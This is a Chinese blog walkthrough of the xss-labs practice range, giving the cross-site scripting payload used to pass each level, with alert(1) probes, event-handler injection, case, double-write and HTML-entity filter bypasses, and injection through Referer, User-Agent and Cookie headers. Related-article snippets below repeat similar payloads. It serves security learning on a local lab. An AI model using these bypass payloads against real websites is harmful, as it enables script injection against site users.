xss-labs攻略

最新推荐文章于 2024-05-12 20:15:26 发布
最新推荐文章于 2024-05-12 20:15:26 发布
阅读量925 收藏 2
点赞数 1
分类专栏: 渗透测试 文章标签: javascript php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/p_utao/article/details/108263692
版权

搭建xss-labs靶场,这里我直接使用phpstudy来快速搭建。

level1

第一关,看到传参值是test然后有输出test的地方,所以猜测点这里,直接弹框跳转到第二关。
在这里插入图片描述

level2

果断过了第一关来到了第二关,根据第一关经验,可以看到输入点和输出点,继续尝试在url里输入弹框语句。
在这里插入图片描述
语句没有执行,那么我们f12审查一下元素。
在这里插入图片描述
发现两个输出点,一个被实体化了,而另外一个可以闭合绕过来执行语句,构造语句:"><script>alert(1)</script>

level3

第三关和1、2关有点不一样了,突破点应该就是这个搜索框了。
在这里插入图片描述
输入弹框语句,f12审查元素发现过滤了<>
在这里插入图片描述
那么我们可以使用oninput事件
构造语句:'' oninput=alert(1) //

level4

跳转到第四关,我们可以看到<>被删除了,和第三关的方式一样我们
构造语句:"> oninput=alert(1) //直接通过。

level5

第五关发现会被替换成这样,但是它没有过滤,那么我们可以这样构造语句:"><a href=javascript:alert(1)>11</a>

level6

和第五关一样,也会把语句进行替换,但是对于大小写没有区分,直接通过大小写绕过。

level7

尝试发现它会删除script那么我们可以双写构造语句:"><scripscriptt>alert(1)</scripscriptt> 直接跳到第八关

level8

尝试了好多都不行,百度一下发现大佬是编码绕过的,只能高呼666了。
构造语句:&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;
在这里插入图片描述

level9

和第八关一样,但是这里好像加了个判断,所以构造语句:
&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;//http://www.baidu.com

level10

type="hidden"是隐藏属性,将输入框隐藏掉了,覆盖type值,三个值中只有t_sort会改变那么构造语句:1&t_sort=" onclick="alert(1)" type="display"在这里插入图片描述

level11

如图所见值为referer的数据所以抓包修改referer的值,构造语句" type="text" onclick="alert(1)

level12

和11一样不过是修改User-Agent

level13

和11、12一样,构造语句:Cookie: user=call+me+maybe%3F" type="text" onclick="alert(1);
在这里插入图片描述

level14和15

14、15关崩了,可以看一下这位表哥的文https://blog.csdn.net/qq_32393893/article/details/104814749

level16

过滤了script和空格并且把/替换成了&nbsp;但是没有过滤<>所以我们构造语句:<img%0asrc='x'%0aonerror=alert(1)>

小知识:%0a是换行

level17和18

onmouseover事件:当鼠标指针移动到图像上时执行一段 JavaScript然后我们构造语句:http://127.0.0.1/xss_c/level17.php?arg01=a&arg02=%20onmouseover=alert(1)

level19和20

看不懂
参考:

https://www.jianshu.com/p/4e3a517bc4ea
https://www.jianshu.com/p/7b8fe7f01d62
https://www.cnblogs.com/wangyuyang1016/p/13532898.html#_caption_7

总结:玩完发现自己学到了好多,希望以后可以学到更多知识,加油!

p_utao
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
xss-labs-master.rar
05-09
xss-labs-master靶机资源,有关于xss漏洞攻击专项练习,一共有二十关,也是小白的看门砖吧!
xss-labs-master源码
07-06
20关xss靶场练习,帮助了解关于xss
XSS-labs通关
em.....
10-24 4186
XSS-labs通关 1.第一关 payload: http://xss/level1.php?name=<Script>alert(1)</Script> 2.第二关 这里变量出现在两处,我们直接利用第二处,做构造以及闭合 payload: 1"><ScRipt>alert(1)</ScRipt> 3.第三关 ​ ​ 用第二关的payload去试一下,发现内容没变化,但是就是没当成js代码 ​ 查一下网页源代码和php代码 ​ 看
xss-labs通关,xss漏洞详解
qq_47289634的博客
01-12 1184
XSS 的原理是 WEB 应用程序混淆了用户提交的数据和 JS 脚本的代码边界,导致浏览器把用户的输入当成了 JS 代码来执行。XSS 的攻击对象是浏览器一端的普通用户。XSS 又叫 CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往 Web 页面里插入恶意 html 代码,当用户浏览该页之时,嵌入其中 Web 里面的 html 代码会被执行,从而达到恶意用户的特殊目的。
2024年前端最全xss-labs通关攻略教程(level1~level 10),前端常用面试题
最新发布
2401_84411522的博客
05-12 265
框架原理真的深入某一部分具体的代码和实现方式时,要多注意到细节,不要只能写出一个框架。算法方面很薄弱的,最好多刷一刷,不然影响你的工资和成功率😯在投递简历之前,最好通过各种渠道找到公司内部的人,先提前了解业务,也可以帮助后期优秀 offer 的决策。要勇于说不,对于某些 offer 待遇不满意、业务不喜欢,应该相信自己,不要因为当下没有更好的 offer 而投降,一份工作短则一年长则 N 年,为了幸福生活要慎重选择!!!发现于上一关基本相同,区别在于value值也被转义。
XSS-labs靶场通关秘籍(level 17-20)
qq_45741871的博客
09-24 590
xss-labs靶场通关秘籍
xss-labs靶场实战全通关详细过程(xss靶场详解)
热门推荐
金 帛的博客
07-13 2万+
xss靶场一到二十关通关详细教程
【网络安全 --- xss-labs靶场通关(1-10关)】详细的xss-labs靶场通关思路及技巧讲解,让你对xss漏洞的理解更深刻
m0_67844671的博客
10-21 3926
【网络安全 --- xss-labs靶场通关(1-10关)】详细的xss-labs靶场通关思路及技巧讲解,让你对xss漏洞的理解更深刻
xss-labs-master.zip(xss注入通关游戏/靶场)
03-21
经典的xss注入通关游戏,搭建简单。适合网络安全测试人员
安装xss-labs ppt手册
10-22
**XSS漏洞详解与XSS-Labs安装指南** XSS(Cross Site Scripting),即跨站脚本攻击,是网络安全领域常见的一种攻击方式。它允许攻击者通过注入恶意脚本到网页中,使得用户在不知情的情况下执行这些脚本,从而获取...
xss-labs靶场通关
10-13
xss-labs靶场通关 本篇文章将对xss-labs靶场的六关源码进行详细的分析和总结,并对每一关的xss攻击payload进行解释。 第一关 xss-labs靶场的第一关源码没有做任何过滤,直接上xss payload:<script>alert("XSS")...
xss-labs靶场一到十关
zxcvbnm123456x的博客
06-26 767
xss的靶场地址为:http://test.ctf8.com/需要先打开phpstudy才能进行练习。
XSS-labs详解
ytdd66的博客
03-23 1701
进入靶场点击图片,开始我们的XSS之旅!
web靶场——xss-labs靶机平台的搭建和代码审计
weixin_51525416的博客
09-05 4501
web靶场-xss-labs靶机平台的搭建和代码审计
xsslabs第三关
weixin_63750160的博客
02-29 463
看到这关想到了第二关那我们先用第二关的思路搞一下。这是htmlspecialchars()并没有逃逸出来所以我们还是看一下源代码。根据源代码我们发现这是一个'闭合。
XSS-labs靶场实战(二)——第4-6关
永远是少年
11-18 643
今天继续给大家介绍渗透测试相关知识,本文主要内容是XSS-labs靶场实战第4-6关。 一、第四关 二、第五关 三、第六关
XSS注入进阶练习篇(一)XSS-LABS通关教程
好好睡觉
02-18 3090
XSS注入靶场、XSS-LABS通关教程
xss-labs带你深入理解xss(已更新1~16)
xhx836161547的博客
12-13 995
为了记录学习过程的想法,写下这篇文章。关于xss-labs的文章有很多,有一些很优秀的讲的比较清楚,也有一些直接粘贴答案什么知识点也不提的,更有甚者复制他人文章作为自己的付费。这篇文章主要是更详细的去说明知识点,以及一些思路的来源,记录我的所思所想,希望能够帮到大家。
xsslabs第四关
weixin_63750160的博客
03-01 601
是一种在各种编程语言中使用的函数,比如PHP,用于替换字符串中所有出现的子字符串。这与第三关的代码是一样的,但是每一关考的点是不一样的所以我们看一下源代码。所以第四关考的点是绕过<>
xss-labs安装
07-28
XSS-labs是一个用于学习和测试跨站脚本攻击(XSS)的平台。根据引用\[1\],在学习了XSS的基础知识并完成了一些简单的XSS测试后,可以开始攻略XSS-labs。不过需要注意的是,对于XSS-labs,我们只需大致了解一些思路即可,因为在实际的应用中,很少会有这种复杂的情况,但在CTF比赛中可能会更常见。 根据引用\[2\],XSS-labs的安装和下载可以通过相关的渗透测试平台或者从官方网站获取。安装完成后,可以开始进行XSS攻击的实践。 在XSS-labs中,可以通过构造特定的payload来触发XSS漏洞。根据引用\[2\]和\[3\]的示例,可以使用ng-include或者src参数来构造包含XSS漏洞的URL。例如,可以构造一个类似于以下的payload来触发XSS漏洞: src='level1.php?name=<a type="text" href="javascript:alert(1)">' 或者 127.0.0.1/xss-labs/level15.php?src='level1.php?name=<a href="javascript:alert(/xss/)">' 通过构造合适的payload,可以利用XSS-labs平台进行XSS攻击的实践和学习。请注意,在实际应用中,XSS攻击是违法行为,请遵守法律法规并仅在合法授权的情况下进行安全测试。 #### 引用[.reference_title] - *1* *2* [渗透学习-靶场篇-XSS-labs(持续更新中)](https://blog.csdn.net/qq_43696276/article/details/127024861)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [xss-labs搭建及通关攻略](https://blog.csdn.net/K_ShenH/article/details/122765092)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值